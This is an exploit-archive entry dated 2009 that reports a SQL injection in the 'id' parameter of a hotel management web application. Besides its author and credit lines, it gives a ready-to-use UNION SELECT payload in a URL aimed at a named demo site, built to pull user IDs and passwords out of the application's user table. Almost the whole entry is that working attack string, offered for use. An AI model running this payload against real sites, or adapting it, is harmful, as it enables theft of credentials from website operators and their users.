SAS Hotel Management System - 'id' SQL Injection
| EKU-ID: 15897 | CVE: OSVDB-51982 | OSVDB-ID: |
| Author: Darkb0x | Published: 2009-02-16 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 15897 | CVE: OSVDB-51982 | OSVDB-ID: |
| Author: Darkb0x | Published: 2009-02-16 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#found by DarkB0x #contact darkB0x97[AT]googlemail.com #greets for str0ke & AlpHaNiX #script : SAS Hotel Management System #download : Null #script home page : http://www.sellatsite.com/sellatsite/hotel.asp #Demo : http://www.aebest.com #Exploits : //*/ http://www.aebest.com/home/myhotel_info.asp?id=0+and+1=0+union+select+0,userid,0,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+h_user #note : the injection's details are in page title ! xD # milw0rm.com [2009-02-16]